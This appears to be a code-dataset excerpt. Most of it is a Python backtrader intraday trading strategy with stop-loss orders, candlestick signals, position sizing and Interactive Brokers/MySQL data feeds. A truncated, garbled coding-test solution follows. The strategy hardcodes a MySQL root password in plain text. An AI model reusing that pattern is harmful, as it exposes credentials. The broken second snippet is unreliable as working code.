self.buy(data=d._name,\n\t\t\t\t\t\t\t\t\t\t\t\tsize=self.size,\n\t\t\t\t\t\t\t\t\t\t\t\texectype=bt.Order.StopTrail,\n\t\t\t\t\t\t\t\t\t\t\t\tprice=self.stoploss('short',d,self.size,modelp.get('dollars_risked_per_trade')),\n\t\t\t\t\t\t\t\t\t\t\t\ttrailamount = self.atr_dist,\n\t\t\t\t\t\t\t\t\t\t\t\ttransmit=True,\n\t\t\t\t\t\t\t\t\t\t\t\tparent=self.short_ord,\n\t\t\t\t\t\t\t\t\t\t\t\tname = short_stop_name,\n\t\t\t\t\t\t\t\t\t\t\t\t)\n\t\t\t\t\t\t\t\t\t\telif not modelp.get('TrailingStop'):\n\t\t\t\t\t\t\t\t\t\t\t#Create Fixed Short Stop Loss\t \n\t\t\t\t\t\t\t\t\t\t\tshort_stop_name = '{} - Fixed StopLoss for Short Entry'.format(d._name)\n\t\t\t\t\t\t\t\t\t\t\tself.short_stop_ord = self.buy(data=d._name,\n\t\t\t\t\t\t\t\t\t\t\t\tsize=self.size,\n\t\t\t\t\t\t\t\t\t\t\t\texectype=bt.Order.Stop,\n\t\t\t\t\t\t\t\t\t\t\t\tprice=self.stoploss('short',d,self.size,modelp.get('dollars_risked_per_trade')),\n\t\t\t\t\t\t\t\t\t\t\t\ttransmit=True,\n\t\t\t\t\t\t\t\t\t\t\t\tparent=self.short_ord,\n\t\t\t\t\t\t\t\t\t\t\t\tname = short_stop_name,\n\t\t\t\t\t\t\t\t\t\t\t\t)\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\t\t\tself.shortstop_dict[d._name] = self.short_stop_ord #dictionary needed by cancel order to access all symbols instead of last symbol\n\t\t\t\t\t\t\t\t\t\tself.sold = len(self) #stores bar number when trade was entered\n\t\t\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\t\telif modelp.get('live_status') and self.data_live:\n\t\t\t\t\t\t\t\t\t\t#Create Short Entry Order\n\t\t\t\t\t\t\t\t\t\tshort_name = '{} - Short Entry'.format(d._name)\n\t\t\t\t\t\t\t\t\t\tself.short_ord = self.sell(data=d._name,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tsize=self.size,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\texectype=bt.Order.Market,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\ttransmit=False,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t)\n\t\t\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\t\t\tself.size_dict[d._name] = self.size\n\t\t\t\t\t\t\t\t\t\tself.target_short_price = round((d.open[0]-(modelp.get('dollars_risked_per_trade')*modelp.get('target'))/self.size),3)\n\t\t\t\t\t\t\t\t\t\tself.target_short_dict[d._name] = round(self.target_short_price,3)\t\n\t\t\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\t\t\tif modelp.get('TrailingStop'):\n\t\t\t\t\t\t\t\t\t\t\t#Create Trailing Short Stop Loss\t \n\t\t\t\t\t\t\t\t\t\t\tshort_stop_name = '{} - Trailing StopLoss for Short Entry'.format(d._name)\n\t\t\t\t\t\t\t\t\t\t\tself.short_stop_ord = self.buy(data=d._name,\n\t\t\t\t\t\t\t\t\t\t\t\tsize=self.size,\n\t\t\t\t\t\t\t\t\t\t\t\texectype=bt.Order.StopTrail,\n\t\t\t\t\t\t\t\t\t\t\t\tprice=self.stoploss('short',d,self.size,modelp.get('dollars_risked_per_trade')),\n\t\t\t\t\t\t\t\t\t\t\t\ttrailamount = self.atr_dist,\n\t\t\t\t\t\t\t\t\t\t\t\ttransmit=True,\n\t\t\t\t\t\t\t\t\t\t\t\tparent=self.short_ord,\n\t\t\t\t\t\t\t\t\t\t\t\tname = short_stop_name,\n\t\t\t\t\t\t\t\t\t\t\t\t)\n\t\t\t\t\t\t\t\t\t\telif not modelp.get('TrailingStop'):\n\t\t\t\t\t\t\t\t\t\t\t#Create Fixed Short Stop Loss\t \n\t\t\t\t\t\t\t\t\t\t\tshort_stop_name = '{} - Fixed StopLoss for Short Entry'.format(d._name)\n\t\t\t\t\t\t\t\t\t\t\tself.short_stop_ord = self.buy(data=d._name,\n\t\t\t\t\t\t\t\t\t\t\t\tsize=self.size,\n\t\t\t\t\t\t\t\t\t\t\t\texectype=bt.Order.Stop,\n\t\t\t\t\t\t\t\t\t\t\t\tprice=self.stoploss('short',d,self.size,modelp.get('dollars_risked_per_trade')),\n\t\t\t\t\t\t\t\t\t\t\t\ttransmit=True,\n\t\t\t\t\t\t\t\t\t\t\t\tparent=self.short_ord,\n\t\t\t\t\t\t\t\t\t\t\t\tname = short_stop_name,\n\t\t\t\t\t\t\t\t\t\t\t\t)\n\t\t\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\t\t\tself.shortstop_dict[d._name] = self.short_stop_ord #dictionary needed by cancel order to access all symbols instead of last symbol\n\t\t\t\n\t\t\t\t#********************************EXIT LOGIC/ORDERS*********************************************\n\t\t\t\telse:\n\t\t\t\t\t#EXIT LOGIC FOR SHORTS\n\t\t\t\t\tif (d._name == d._name[:-1]+'0'\n\t\t\t\t\t\t#and not (d._name[:-1]=='VIX' or d._name[:-1]=='TICK-NYSE' or d._name[:-1]=='TRIN-NYSE' or d._name[:-1]=='SPY')\t\n\t\t\t\t\t\tand self.pos < 0\n\t\t\t\t\t\tand self.inorder_dict.get(d._name)\n\t\t\t\t\t\tand self.prenext_done #Start trading after all prenext data loads \n\t\t\t\t\t\tand (self.short_exit_price is not None and d.open[0] <= self.short_exit_price) #or self.hourmin=='14:50')\t\n\t\t\t\t\t\t):\t\t\n\t\n\t\t\t\t\t\t#SHORT EXIT ORDER - closes existing position and cancels outstanding stop-loss ord\t\n\t\t\t\t\t\tself.exit_short_name = '{} - Exit Short Trade'.format(d._name) \n\t\t\t\t\t\tself.exit_short = self.close(d._name,\n\t\t\t\t\t\t\t\t\t\t\t\t\tsize=self.size_dict.get(d._name),\n\t\t\t\t\t\t\t\t\t\t\t\t\tname=self.exit_short_name)\n\t\n\t\t\t\t\t\tself.inorder_dict[d._name] = False\n\t\t\t\t\t\tshort_stop_ord = self.shortstop_dict.get(d._name) #Need dictionary or else self.cancel_shortstop will only call the last symbol returned for short_stop_ord (not all symbols)\n\t\t\t\t\t\tself.cancel_shortstop = self.cancel(short_stop_ord) \n\t\n\t\t\t\t\t#EXIT LOGIC FOR LONGS\n\t\t\t\t\telif (d._name == d._name[:-1]+'0'\n\t\t\t\t\t\t#and not (d._name[:-1]=='VIX' or d._name[:-1]=='TICK-NYSE' or d._name[:-1]=='TRIN-NYSE' or d._name[:-1]=='SPY')\t\n\t\t\t\t\t\tand self.pos > 0\n\t\t\t\t\t\tand (self.datastatus or self.prenext_done) #Start trading after all prenext loads (live and backtest modes) \n\t\t\t\t\t\tand (self.long_exit_price is not None and d.open[0] >= self.long_exit_price) #or self.hourmin=='14:50')\n\t\t\t\t\t\t):\n\t\t\t\t\t\t\n\t\t\t\t\t\t#LONG EXIT ORDER - closes existing position and cancels outstanding stop-loss order\n\t\t\t\t\t\tself.exit_long_name = '{} - Exit Long Trade'.format(d._name)\n\t\t\t\t\t\t\n\t\t\t\t\t\tself.exit_long = self.close(d._name,\n\t\t\t\t\t\t\t\t\t\t\t\t\tsize=self.size_dict.get(d._name),\n\t\t\t\t\t\t\t\t\t\t\t\t\tname=self.exit_long_name)\n\t\t\t\t\t\t\n\t\t\t\t\t\tself.inorder_dict[d._name] = False\t\t\t\t\t\t\n\t\t\t\t\t\tlong_stop_ord = self.longstop_dict.get(d._name)\n\t\t\t\t\t\tself.cancel_longstop = self.cancel(long_stop_ord)\t\t\t\t\n\t\t\t\t\t\t\t\n\t\t\t\t#-------------------------------OUTPUT RESULTS--------------------------------------------\n\t\t\t\t#PRINT RESULTS\n\t\t\t\tif UserInputs.model_params().get('printlines') or modelp.get('live_status'): #need to ensure all data has loaded for longest indicators\n\t\t\t\t\tout = [ 'Strategy: {}'.format(len(self)),\n\t\t\t\t\t\t\t'Data {}'.format(str(i)), \n\t\t\t\t\t\t\td._name,\n\t\t\t\t\t\t\t#len(self.data0),\n\t\t\t\t\t\t\t#len(self.data1),\n\t\t\t\t\t\t\t#len(self.data2),\n\t\t\t\t\t\t\t#len(self.data3),\n\t\t\t\t\t\t\t#self.counter,len(d),\n\t\t\t\t\t\t\td.datetime.datetime().strftime('%Y-%m-%d %H:%M:%S'),\n\t\t\t\t\t\t\tself.atr_mod,\n\t\t\t\t\t\t\td.open[0],\n\t\t\t\t\t\t\td.high[0],\n\t\t\t\t\t\t\td.low[0],\n\t\t\t\t\t\t\td.close[0],\n\t\t\t\t\t\t\t#self.sup_dict.get(d._name),\n\t\t\t\t\t\t\t#self.sup_t1,\n\t\t\t\t\t\t\tself.slope_t0,\n\t\t\t\t\t\t\tself.range_high,\n\t\t\t\t\t\t\tself.range_low,\n\t\t\t\t\t\t\t#self.slope_t1,\n\t\t\t\t\t\t\t]\t\t\t\t\t\n\t\t\t\t\tprint(','.join(str(x) for x in out))\n\t\t\t\t\t\t\t\t\n\t\t\t#TIMER (to determine code speed)\n\t\t\tif UserInputs.model_params().get('timer')=='on' and self.nextcounter == len(self.datas):\n\t\t\t\tself.nextcounter=0\n\t\t\t\tt1 = datetime.utcnow() \n\t\t\t\tdiff = t1-self.t0\n\t\t\t\tprint(diff.total_seconds())\n\n\t#-------------------------------Key Strategy Methods-------------------------------------------------------------------\n\tdef maxtimeframe(self):\n\t\t#Determine max timeframe used by program, and return its length - ensures enough data has loaded to start calc.\n\t\ttime1 = UserInputs.model_params().get('timeframe1on')\n\t\ttime2 = UserInputs.model_params().get('timeframe2on')\n\t\tif time1 and time2:\n\t\t\tfor x in range(2, len(self.datas)):\n\t\t\t\t\td = self.datas[x]\n\t\t\t\t\tif len(d)>0:\n\t\t\t\t\t\tbreak\n\t\t\treturn(len(d))\n\t\tif time1 and not time2:\n\t\t\tfor x in range(1, len(self.datas)):\n\t\t\t\t\td = self.datas[x]\n\t\t\t\t\tif len(d)>0:\n\t\t\t\t\t\tbreak\n\t\t\treturn(len(d))\n\t\telse:\n\t\t\tfor x in range(0, len(self.datas)):\n\t\t\t\t\td = self.datas[x]\n\t\t\t\t\tif len(d)>0:\n\t\t\t\t\t\tbreak\n\t\t\treturn(len(d))\n\t\t\t\n\tdef max_ind_period(self):\n\t\t#Determine lookback period of longest indicator\n\t\tindicator_dict = UserInputs.ind_params()\n\t\tmax_ind = max(indicator_dict.values()) \n\t\treturn max_ind\n\t\t\n\tdef resistance(self,high,low,min_touches,tolerance_perc,bounce_perc):\n\t\t#Identifies resistance levels\n\t\t#Set default values for resistance level to 0\n\t\tres = 10000\n\t\t\n\t\t#Identifying local high and local low\n\t\tmaxima = max(high) #High represents a series of highs over specific lookback period\n\t\t#print('Maxima {}'.format(maxima))\n\t\t\n\t\tminima = min(low)\t#Low represents a series of lows over specific lookback period\n\t\n\t\t#Calculate distance between max and min (total price movement)\n\t\tmove_range = maxima - minima\n\t\t\n\t\t#Calculate bounce distance and allowable margin of error for proximity to support/resistance \n\t\tmove_allowance = move_range * (tolerance_perc/100)\n\t\tbounce_distance = move_range * (bounce_perc/100)\n\t\t\n\t\t#Test resistance by iterating through data to check for touches delimited by bounces\n\t\ttouchdown = 0\n\t\tawaiting_bounce = False\n\t\tfor x in range(0,len(high)):\n\t\t\tif abs(maxima - high[x]) < move_allowance and not awaiting_bounce:\n\t\t\t\ttouchdown = touchdown + 1\n\t\t\t\tawaiting_bounce = True\n\t\t\telif abs(maxima - high[x]) > bounce_distance:\n\t\t\t\tawaiting_bounce = False\n\t\tif touchdown >= min_touches:\n\t\t\tres = maxima\n\t\treturn res\n\t\t\n\tdef support(self,high,low,min_touches,tolerance_perc,bounce_perc):\n\t\t#Identifies support levels\n\t\t#Set default values for support level to 0\n\t\tsup = 0\n\t\t\n\t\t#Identifying local high and local low\n\t\tmaxima = max(high) #High represents a series of highs over specific lookback period\n\t\tminima = min(low)\t#Low represents a series of lows over specific lookback period\n\t\n\t\t#Calculate distance between max and min (total price movement)\n\t\tmove_range = maxima - minima\n\t\t\n\t\t#Calculate bounce distance and allowable margin of error for proximity to support/resistance \n\t\tmove_allowance = move_range * (tolerance_perc/100)\n\t\tbounce_distance = move_range * (bounce_perc/100)\t\n\t\t#Test support by iterating through data to check for touches delimited by bounces\n\t\ttouchdown = 0\n\t\tawaiting_bounce = False\n\t\tfor x in range(0,len(low)):\n\t\t\tif abs(low[x] - minima) < move_allowance and not awaiting_bounce:\n\t\t\t\ttouchdown = touchdown + 1\n\t\t\t\tawaiting_bounce = True\n\t\t\telif abs(low[x] - minima) > bounce_distance:\n\t\t\t\tawaiting_bounce = False\n\t\tif touchdown >= min_touches:\n\t\t\tsup = minima\n\t\treturn sup\t\n\t\n\tdef stoploss(self,direction,mydata,size,dolrisk):\n\t\t#Creates stop loss price for both long and short orders, based on price volatility (atr)\n\t\tif direction == 'short':\n\t\t\tshort_stop = ((mydata.close[0]*size)+dolrisk)/size\n\t\t\treturn round(short_stop,2)\n\t\telif direction == 'long':\n\t\t\tlong_stop = ((mydata.close[0]*size)-dolrisk)/size \n\t\t\treturn round(long_stop,2)\n\n\tdef sizing(self,data,data_name,total_dollars_risked,dollars_risked_trade,atr):\n\t\t#Creates an order size based on price volatility(atr) and dollars risked per trade\n\t\tif(len(data)<=UserInputs.ind_params().get('atrperiod')):return 0\n\t\t\n\t\tmaxsize = total_dollars_risked/data.close[0] #size based on max investment per trade\n\t\tatrdist = UserInputs.ind_params().get('atrdist')\n\t\tatrsize = dollars_risked_trade/(atr*atrdist) #size based on atr\n\t\t\n\t\tsize = int(min(atrsize,maxsize)) #needs to be integer for IB to process . #Ensure size doesn't cost more than total_dollars_risked\n\t\treturn size \n\n\tdef open_gap(self,ticker,mydata):\n\t\t#Determine opening gap from yesterday's close\n\t\tif self.hourmin == '08:30':\n\t\t\tgap = (mydata.open[0]-mydata.close[-1])/mydata.close[0]*100\n\t\t\t#Add self.gap to dictionary, with key name as stock name and value as self.gap, so we can access all stocks instead of just last one\t\t\n\t\t\tself.gap_dict[ticker] = round(gap,3)\n\t\t\t\n\t\t#lookup up symbol name within gap dictionary you just created above and return gap as self.open_gap\n\t\topen_gap = self.gap_dict.get(ticker)\n\t\treturn open_gap\n\n\tdef open_range(self,direction,data_name):\n\t\t#Determines high and low opening range for day\n\t\tif self.hourmin == '08:50':\n\t\t\trng_high = round(self.inds[data_name]['highest'][0],2)\n\t\t\trng_low = round(self.inds[data_name]['lowest'][0],2)\n\t\t\tself.rnghigh_dict[data_name] = round(rng_high,3)\n\t\t\tself.rnglow_dict[data_name] = round(rng_low,3)\n\t\n\t\tif direction=='high':\n\t\t\topen_range = self.rnghigh_dict.get(data_name)\n\t\telif direction=='low':\n\t\t\topen_range = self.rnglow_dict.get(data_name)\n\t\treturn open_range\n\t\t\t\n\tdef average_atr(self,data_name):\n\t\t#Determines average of atr's so we can back into volatility\n\t\tatr = self.inds[data_name]['atr'][0]\n\t\tself.atr_list.append(atr)\n\t\t#if avg_atr_per is 5, it averages the last 5 period atr's\n\t\tavg_atr = sum(self.atr_list[-UserInputs.ind_params().get('avg_atr_per'):])/len(self.atr_list[-5:])\n\t\treturn avg_atr\n\t\t\n\tdef bullish_engulfing(self,mydata,slope):\n\t\t#Candlestick reversal pattern - long signal\n\t\t\n\t\tif (slope < 0\n\t\t\tand mydata.close[-1]< mydata.open[-1]\n\t\t\tand mydata.close[0] > mydata.open[0]\n\t\t\tand mydata.close[0] > mydata.open[-1]\n\t\t\tand mydata.open[0] < mydata.close[-1]\n\t\t\t):\n\t\t\tsignal = True\n\t\telse:\n\t\t\tsignal = False\n\t\treturn signal\n\t\t\n\tdef bearish_engulfing(self,mydata,slope):\n\t\t#Candlestick reversal pattern - short signal\n\t\tif (slope > 0\n\t\t\tand mydata.close[-1]> mydata.open[-1]\n\t\t\tand mydata.close[0] < mydata.open[0]\n\t\t\tand mydata.close[0] < mydata.open[-1]\n\t\t\tand mydata.open[0] > mydata.close[-1]\n\t\t\t):\n\t\t\tsignal = True\n\t\telse:\n\t\t\tsignal = False\n\t\treturn signal\n\t\t\t\n\tdef bullish_three_line_strike(self,mydata):\n\t\t#Candlestick pattern\n\t\tif (mydata.close[-2]< mydata.close[-3]\n\t\t\tand mydata.close[-1]< mydata.close[-2]\n\t\t\tand mydata.open[-2] < mydata.open[-3]\n\t\t\tand mydata.open[-1] < mydata.open[-2]\n\t\t\tand mydata.open[0] < mydata.open[-1]\n\t\t\tand mydata.open[0] <= mydata.close[-1]\n\t\t\tand mydata.close[0] > mydata.open[-3]\n\t\t\t):\n\t\t\tsignal = True\n\t\telse:\n\t\t\tsignal = False\n\t\treturn signal\n\n\tdef bearish_three_line_strike(self,mydata):\n\t\t#Candlestick pattern\n\t\tif (mydata.close[-2]> mydata.close[-3]\n\t\t\tand mydata.close[-1]> mydata.close[-2]\n\t\t\tand mydata.open[-2] > mydata.open[-3]\n\t\t\tand mydata.open[-1] > mydata.open[-2]\n\t\t\tand mydata.open[0] > mydata.open[-1]\n\t\t\tand mydata.open[0] >= mydata.close[-1]\n\t\t\tand mydata.close[0] < mydata.open[-3]\n\t\t\t):\n\t\t\tsignal = True\n\t\telse:\n\t\t\tsignal = False\n\t\treturn signal\n\t\t\t\n\tdata_live = False\n\tdef notify_data(self, data, status):\n\t\t#To notify us when delayed backfilled data becomes live data during live trading\n\t\tprint('*' * 5, 'DATA NOTIF:', data._getstatusname(status))\n\t\tif status == data.LIVE:\n\t\t\tself.data_live = True\n\t\t\tself.datastatus = 1\t\n\t\t\t\t\t\t\n\tdef log(self, txt, dt=None):\n\t\t''' Logging function for this strategy'''\n\t\tdt = self.datetime.date()\n\t\tmystring = ' {},{}'.format(dt.isoformat(), txt)\n\t\treturn mystring\n\t\t\n#********************************************RUN STRATEGY*******************************************************\t\ndef runstrat():\n\t\n\t#Create an instance of cerebro\n\tcerebro = bt.Cerebro(exactbars=-1) #exactbars True reduces memory usage significantly, but change to '-1' for partial memory savings (keeping indicators in memory) or 'false' to turn off completely if having trouble accessing bars beyond max indicator paramaters. \n\tcerebro.broker.set_coc(False) #cheat on close allows you to buy the close price of the current bar in which order was made. cheat on open allows you to simulate a market order on the open price of the next bar\n\tcerebro.broker.set_coo(False) #cheat on close allows you to buy the close price of the current bar in which order was made. cheat on open allows you to simulate a market order on the open price of the next bar\n\t\n\t#Add our strategy\n\tcerebro.addstrategy(Strategy)\n\t\n\t#Create/Instantiate objects to access parameters from UserInput Class\n\t#Can NOT create object referencing Strategy class as per backtrader\n\tmodelp = UserInputs.model_params()\n\tindp = UserInputs.ind_params()\n\tdatalist = UserInputs.datalist('hist')\n\tibdatalist = UserInputs.datalist('ib')\n\t\n\t#Ensure stock lists have no duplicates - duplicates will BREAK program\n\tif len(datalist) != len(set(datalist)) or len(ibdatalist) != len(set(ibdatalist)):\n\t\tprint(\"*****You have duplicates in stock list - FIX LIST*****\")\n\t\n\t#GET THE DATA\n\tsession_start = modelp.get('sessionstart')\n\tsession_end = modelp.get('sessionend')\t\n\t\n\tif modelp.get('live_status'):\n\t\t#***** LIVE TRADING PARAMETERS*******\n\t\tstore = bt.stores.IBStore(host='127.0.0.1',\n\t\t\t\t\t\t\t\tport=7497,\n\t\t\t\t\t\t\t\tclientId = 100)\n\t\t\n\t\t#get number of tickers\n\t\tticker_count = len(ibdatalist)\n\t\t\n\t\tindicator_dict = UserInputs.ind_params()\n\t\tmax_ind = max(indicator_dict.values()) \n\t\t\t\t\t\t\t\n\t\t#Data set for live trading IB\n\t\tfor i,j in enumerate(ibdatalist):\n\t\t\t\n\t\t\t#Data for live IB trading\n\t\t\tdata = store.getdata(dataname=j,\n\t\t\t\t\t\t\t\ttimeframe=bt.TimeFrame.Minutes,\n\t\t\t\t\t\t\t\ttz = pytz.timezone('US/Central'),\n\t\t\t\t\t\t\t\t#historical = True, \n\t\t\t\t\t\t\t\tbackfill_start = True, #true enables maximum allowable backfill in single request\n\t\t\t\t\t\t\t\tuseRTH = True, \n\t\t\t\t\t\t\t\trtbar=True,\n\t\t\t\t\t\t\t\tfromdate = UserInputs.ib_backfill_start(UserInputs.max_ind()),#from date determined by today - max period paramater \n\t\t\t\t\t\t\t\tsessionstart = session_start,\n\t\t\t\t\t\t\t\tsessionend = session_end,\n\t\t\t\t\t\t\t\tnotifyall=True,\n\t\t\t\t\t\t\t\tqcheck=2.0,\n\t\t\t\t\t\t\t\tdebug=True)\n\t\t\t\n\t\t\tcerebro.resampledata(data, name=\"{}0\".format(j),timeframe=bt.TimeFrame.Minutes, compression=modelp.get('base_timeframe'))\n\t\t\t\n\t\t\t#Apply resamplings\n\t\t\tif modelp.get('timeframe1on'):\n\t\t\t\tdata_Timeframe1 = cerebro.resampledata(data,name=\"{}1\".format(j),\n\t\t\t\t\t\t\t\t\t\t\t\t\t\ttimeframe=bt.TimeFrame.Minutes,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\tcompression = modelp.get('timeframe1'))\n\t\t\t\n\t\t\tif modelp.get('timeframe2on'):\n\t\t\t\tdata_Timeframe2 = cerebro.resampledata(data,name=\"{}2\".format(j),\n\t\t\t\t\t\t\t\t\t\t\t\t\t\ttimeframe=bt.TimeFrame.Minutes,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\tcompression = modelp.get('timeframe2'))\n\t\t\t\t\t\t\t\t\t\t\n\t\t\tcerebro.broker = store.getbroker()\n\t\t\t\n\t\t\n\telif not modelp.get('live_status'):\n\t\t#******BACTESTING ONLY - MYSQL DATABASE*********\n\t\t\n\t\t#get number of tickers\n\t\tticker_count = len(datalist)\n\t\n\t\t#mysql configuration items for connection\n\t\thost = '127.0.0.1'\n\t\tuser = 'root'\n\t\tpassword = 'EptL@Rl!1'\n\t\tdatabase = 'Stock_Prices'\n\t\ttable = '5_min_prices'\n\t\t\n\t\t#Determine data range to run\n\t\tstart_date = modelp.get('start_date')\n\t\tend_date = modelp.get('end_date')\n\t\n\t\tfor i,j in enumerate(datalist):\n\t\t\t#Get data from mysql and add data to Cerebro\n\t\t\tdata = mysql.MySQLData(dbHost = host,\n\t\t\t\t\t\t\t\t\tdbUser = user,\n\t\t\t\t\t\t\t\t\tdbPWD = password,\n\t\t\t\t\t\t\t\t\tdbName = database,\n\t\t\t\t\t\t\t\t\ttable = table,\n\t\t\t\t\t\t\t\t\tsymbol = j,\n\t\t\t\t\t\t\t\t\tfromdate = start_date,\n\t\t\t\t\t\t\t\t\ttodate= end_date,\n\t\t\t\t\t\t\t\t\tsessionstart = session_start,\n\t\t\t\t\t\t\t\t\tsessionend = session_end,\n\t\t\t\t\t\t\t\t\ttimeframe=bt.TimeFrame.Minutes,\n\t\t\t\t\t\t\t\t\tcompression = modelp.get('base_timeframe'),\n\t\t\t\t\t\t\t\t\t)\n\t\t\t\t\t\t\t\t\t\n\t\t\tdata_BaseTimeframe = cerebro.adddata(data=data, \n\t\t\t\t\t\t\t\t\t\t\t\tname=\"{}0\".format(j),\n\t\t\t\t\t\t\t\t\t\t\t\t)\n\t\t\tdata_BaseTimeframe.csv=True #Report this data to csv file (true) or not (false)\t\n\t\t\tdata_BaseTimeframe.plotinfo.plot = True\n\t\t\t\n\t\t\tif modelp.get('timeframe1on'):\n\t\t\t\t#Apply resamplings\t\t\t\n\t\t\t\tdata_Timeframe1 = cerebro.resampledata(data,\n\t\t\t\t\t\t\t\t\t\tname=\"{}1\".format(j),\n\t\t\t\t\t\t\t\t\t\ttimeframe=bt.TimeFrame.Minutes,\n\t\t\t\t\t\t\t\t\t\tcompression = modelp.get('timeframe1'),\n\t\t\t\t\t\t\t\t\t\t)\n\t\t\t\tdata_Timeframe1.csv=False #Report this data to csv file (true) or not (false)\t\t\t\t\n\t\t\t\tdata_Timeframe1.plotinfo.plot = True\n\t\t\t\t#data_Timeframe1.plotinfo.plotmaster = data_BaseTimeframe\n\t\n\t\t\tif modelp.get('timeframe2on'):\n\t\t\t\tdata_Timeframe2 = cerebro.resampledata(data,\n\t\t\t\t\t\t\t\t\t\tname=\"{}2\".format(j),\n\t\t\t\t\t\t\t\t\t\ttimeframe=bt.TimeFrame.Minutes,\n\t\t\t\t\t\t\t\t\t\tcompression = modelp.get('timeframe2'),\n\t\t\t\t\t\t\t\t\t\t)\n\t\t\t\tdata_Timeframe2.csv=False #Report this data to csv file (true) or not (false)\t\n\t\t\t\tdata_Timeframe2.plotinfo.plot = True\n\t\t\t\t#data_Timeframe2.plotinfo.plotmaster = data_BaseTimeframe\n\t\t\t\n\t\t# Set our desired cash start\n\t\tcerebro.broker.setcash(modelp.get('start_cash'))\n\t\t\n\t\t# Set the commission\n\t\tcerebro.broker.setcommission(commission=0.00003,\n\t\t\t\t\t\t\t\t\tmargin= None,\n\t\t\t\t\t\t\t\t\tmult=1.0,\n\t\t\t\t\t\t\t\t\tcommtype=None,\n\t\t\t\t\t\t\t\t\tpercabs=True,\n\t\t\t\t\t\t\t\t\tstocklike=True,\n\t\t\t\t\t\t\t\t\tleverage=1)\n\t\t\n\t\t\"\"\"\n\t\t#Set the slippage\n\t\tcerebro.broker.set_slippage_perc(0.001,\n\t\t\t\t\t\t\t\t\t\tslip_open=True, \n\t\t\t\t\t\t\t\t\t\tslip_limit=True,\n\t\t\t\t\t\t\t\t\t\tslip_match=True,\n\t\t\t\t\t\t\t\t\t\tslip_out=False)\n\t\t\"\"\"\n\t\t\n\t# Add SQN to qualify the trades (rating to analyze quality of trading system: 2.5-3 good, above 3 excellent. SquareRoot(NumberTrades) * Average(TradesProfit) / StdDev(TradesProfit). Need at least 30 trades to be reliable\n\tcerebro.addanalyzer(bt.analyzers.SQN)\n\t\n\t#Adding my own custom analyzer - when creating analyzer, make sure to include file in _init_.py within backtrader.analyzer folder so it runs\n\tcerebro.addanalyzer(bt.analyzers.AcctStats)\n\t\n\t#Adding analyzer for drawdown\n\tcerebro.addanalyzer(bt.analyzers.DrawDown)\n\t\n\t# Add TradeAnalyzer to output trade statistics\n\tcerebro.addanalyzer(bt.analyzers.Transactions)\n\t\n\t#Adds just buy/sell observer to chart (assuming stdstats is set to false)\n\tcerebro.addobservermulti(bt.observers.BuySell)\n\t\n\t#Adds custom observers\n\tcerebro.addobserver(bt.observers.AcctValue) #reports trade statistics in command prompt at end of program run\n\tcerebro.addobserver(bt.observers.OrderObserver) #reports trades in command prompt when program is run\n\t\n\t#Generate output report in csv format\n\tif UserInputs.model_params().get('writer')=='on':\n\t\tcurrent_time = datetime.now().strftime(\"%Y-%m-%d_%H.%M.%S.csv\") \n\t\tcsv_file = 'C:/Program Files (x86)/Python36-32/Lib/site-packages/backtrader/out/'\n\t\tcsv_file += 'Strategy'\n\t\tcsv_file += current_time\n\t\tcerebro.addwriter(bt.WriterFile, csv = True, out=csv_file)\n\t\tprint(\"Writer CSV Report On\")\n\n\t\n\t#RUN EVERYTHING\n\tresults = cerebro.run(stdstats=False, #enables some additional chart information like profit/loss, buy/sell, etc, but tends to clutter chart\n\t\t\t\t\t\trunonce=False,\n\t\t\t\t\t\t)\n\t\n\tstrats = results[0]\n\t\t\n\tif not modelp.get('live_status'):\n\t\n\t\t#Print analyzers\n\t\tfor alyzer in strats.analyzers:\n\t\t\talyzer.print()\n\t\t\n\t\t#Calculate Program end time\n\t\tend_time = datetime.now().time()\n\t\tprint('Program end at {}'.format(end_time))\n\t\t\n\t\t#Chart all timeframes, one by one\n\t\tfor i in range (len(strats.datas)):\n\t\t\tfor j, d in enumerate(strats.datas):\n\t\t\t\td.plotinfo.plot = i ==j\n\t\t\tcerebro.plot(volume = True, style='candlestick',barup='olive', bardown='lightpink',volup = 'lightgreen',voldown='crimson')\n\t\t\n\t\t#Only chart 5 minute graphs, one by one\n\t\t\"\"\"\n\t\tfor i in range (0,len(strats.datas),data_feed_count):\n\t\t\tfor j, d in enumerate(strats.datas):\n\t\t\t\td.plotinfo.plot = i ==j\t\n\t\t\tcerebro.plot(style='candlestick',barup='olive', bardown='lightpink',volup = 'lightgreen',voldown='crimson')\n\t\t\"\"\"\n\nif __name__ == '__main__':\n\t\n\t#Run strategy\n\trunstrat()\n","sub_path":"myscripts/Trading Package/archive_trading model/Working Trading Modelv52.py","file_name":"Working Trading Modelv52.py","file_ext":"py","file_size_in_byte":51879,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"351329507","text":"def solution(N, stages):\n answer = []\n stages.sort()\n fail=list()\n index=list()\n for i in range(N):\n if i+1 in stages:\n fail.append(stages.count(i+1)/len(stages[stages.index(i+1):]))\n elif i+1 0:\n location=fail.index(max(fail))\n answer.append(index[location])\n index.pop(location)\n fail.pop(location)\n \n return answer\n","sub_path":"Programmers/Level_1/[2019 KAKO BLIND RECRUITMENT] 실패율.py","file_name":"[2019 KAKO BLIND RECRUITMENT] 실패율.py","file_ext":"py","file_size_in_byte":555,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
